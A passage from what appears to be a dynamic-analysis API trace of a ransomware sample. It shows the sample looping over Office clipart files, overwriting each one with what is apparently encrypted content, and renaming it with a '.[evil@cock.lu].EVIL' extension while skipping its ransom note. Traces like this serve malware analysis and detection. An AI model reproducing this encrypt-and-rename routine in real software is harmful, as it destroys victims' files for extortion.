Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF", dwFileAttributes=0x200) returned 0 [0147.736] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.736] wcsstr (_Str="J0172035.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.736] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF") returned 69 [0147.736] wcscmp (_String1="J0172035.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.736] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0172035.WMF") returned 0x0 [0147.736] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF") returned 0x45 [0147.736] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172035.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.738] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d18, lpOverlapped=0x0) returned 1 [0147.745] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.745] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.745] _errno () returned 0x84b1160840 [0147.745] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.745] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1d20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1d20, lpOverlapped=0x0) returned 1 [0147.746] CloseHandle (hObject=0x1a8) returned 1 [0147.746] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.746] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.746] __uncaught_exception () returned 0x84b1160800 [0147.746] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.746] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172035.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172035.wmf.[evil@cock.lu].evil")) returned 1 [0147.747] ??_V@YAXPEAX@Z () returned 0x1 [0147.750] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF", dwFileAttributes=0x200) returned 0 [0147.750] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.750] wcsstr (_Str="J0172067.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.750] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF") returned 69 [0147.750] wcscmp (_String1="J0172067.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.750] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0172067.WMF") returned 0x0 [0147.750] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF") returned 0x45 [0147.750] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172067.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.752] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b74, lpOverlapped=0x0) returned 1 [0147.759] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.759] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.759] _errno () returned 0x84b1160840 [0147.759] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.759] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1b80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b80, lpOverlapped=0x0) returned 1 [0147.759] CloseHandle (hObject=0x1a8) returned 1 [0147.759] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.760] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.760] __uncaught_exception () returned 0x84b1160800 [0147.760] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.760] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172067.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172067.wmf.[evil@cock.lu].evil")) returned 1 [0147.761] ??_V@YAXPEAX@Z () returned 0x1 [0147.763] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF", dwFileAttributes=0x200) returned 0 [0147.763] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.763] wcsstr (_Str="J0172193.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.763] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 69 [0147.764] wcscmp (_String1="J0172193.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.764] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0172193.WMF") returned 0x0 [0147.764] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 0x45 [0147.764] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.765] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3198, lpOverlapped=0x0) returned 1 [0147.774] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.774] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.774] _errno () returned 0x84b1160840 [0147.774] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.774] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x31a0, lpOverlapped=0x0) returned 1 [0147.774] CloseHandle (hObject=0x1a8) returned 1 [0147.774] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.774] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.774] __uncaught_exception () returned 0x84b1160800 [0147.774] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.775] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf.[evil@cock.lu].evil")) returned 1 [0147.775] ??_V@YAXPEAX@Z () returned 0x1 [0147.778] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF", dwFileAttributes=0x200) returned 0 [0147.778] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.778] wcsstr (_Str="J0174315.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.778] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 69 [0147.778] wcscmp (_String1="J0174315.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.778] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0174315.WMF") returned 0x0 [0147.778] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 0x45 [0147.778] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.780] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16e8, lpOverlapped=0x0) returned 1 [0147.794] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.794] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.794] _errno () returned 0x84b1160840 [0147.794] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.794] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1700, lpOverlapped=0x0) returned 1 [0147.794] CloseHandle (hObject=0x1a8) returned 1 [0147.794] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.795] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.795] __uncaught_exception () returned 0x84b1160800 [0147.795] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.795] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf.[evil@cock.lu].evil")) returned 1 [0147.796] ??_V@YAXPEAX@Z () returned 0x1 [0147.799] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF", dwFileAttributes=0x200) returned 0 [0147.799] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.799] wcsstr (_Str="J0174635.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.799] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 69 [0147.799] wcscmp (_String1="J0174635.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.799] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0174635.WMF") returned 0x0 [0147.799] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF") returned 0x45 [0147.799] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.801] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2608, lpOverlapped=0x0) returned 1 [0147.809] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.809] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.809] _errno () returned 0x84b1160840 [0147.809] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.809] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x2620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2620, lpOverlapped=0x0) returned 1 [0147.809] CloseHandle (hObject=0x1a8) returned 1 [0147.809] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.809] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.809] __uncaught_exception () returned 0x84b1160800 [0147.809] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.809] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf.[evil@cock.lu].evil")) returned 1 [0147.810] ??_V@YAXPEAX@Z () returned 0x1 [0147.813] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF", dwFileAttributes=0x200) returned 0 [0147.813] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.813] wcsstr (_Str="J0174639.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.813] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 69 [0147.813] wcscmp (_String1="J0174639.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.813] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0174639.WMF") returned 0x0 [0147.813] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF") returned 0x45 [0147.813] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.816] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13ec, lpOverlapped=0x0) returned 1 [0147.889] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.889] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.889] _errno () returned 0x84b1160840 [0147.889] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.889] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1400, lpOverlapped=0x0) returned 1 [0147.889] CloseHandle (hObject=0x1a8) returned 1 [0147.889] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.889] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.890] __uncaught_exception () returned 0x84b1160800 [0147.890] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.890] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf.[evil@cock.lu].evil")) returned 1 [0147.891] ??_V@YAXPEAX@Z () returned 0x1 [0147.894] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF", dwFileAttributes=0x200) returned 0 [0147.894] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.894] wcsstr (_Str="J0174952.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.894] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG") returned 69 [0147.894] wcscmp (_String1="J0174952.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.894] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0174952.JPG") returned 0x0 [0147.894] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG") returned 0x45 [0147.894] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174952.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.897] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6196, lpOverlapped=0x0) returned 1 [0147.914] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.914] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.914] _errno () returned 0x84b1160840 [0147.914] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.914] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x61a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x61a0, lpOverlapped=0x0) returned 1 [0147.915] CloseHandle (hObject=0x1a8) returned 1 [0147.915] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.915] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.915] __uncaught_exception () returned 0x84b1160800 [0147.915] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.915] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174952.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174952.jpg.[evil@cock.lu].evil")) returned 1 [0147.916] ??_V@YAXPEAX@Z () returned 0x1 [0147.919] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG", dwFileAttributes=0x200) returned 0 [0147.920] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.920] wcsstr (_Str="J0175361.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.920] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG") returned 69 [0147.920] wcscmp (_String1="J0175361.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0147.920] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0175361.JPG") returned 0x0 [0147.920] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG") returned 0x45 [0147.920] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175361.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0147.922] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb57d, lpOverlapped=0x0) returned 1 [0147.938] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.938] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0147.938] _errno () returned 0x84b1160840 [0147.938] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.938] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xb580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb580, lpOverlapped=0x0) returned 1 [0147.939] CloseHandle (hObject=0x1a8) returned 1 [0147.939] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0147.939] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0147.939] __uncaught_exception () returned 0x84b1160800 [0147.939] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0147.939] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175361.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175361.jpg.[evil@cock.lu].evil")) returned 1 [0147.940] ??_V@YAXPEAX@Z () returned 0x1 [0147.943] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG", dwFileAttributes=0x200) returned 0 [0147.943] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0147.943] wcsstr (_Str="J0175428.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0147.943] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG") returned 69 [0147.943] wcscmp (_String1="J0175428.JPG", 